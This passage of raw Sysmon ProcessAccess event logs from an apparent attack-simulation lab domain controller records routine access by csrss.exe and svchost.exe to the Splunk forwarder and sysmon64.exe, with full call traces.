C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2075-5F25-0000-00107E2B0600}","TargetProcessId":"2440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4140,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 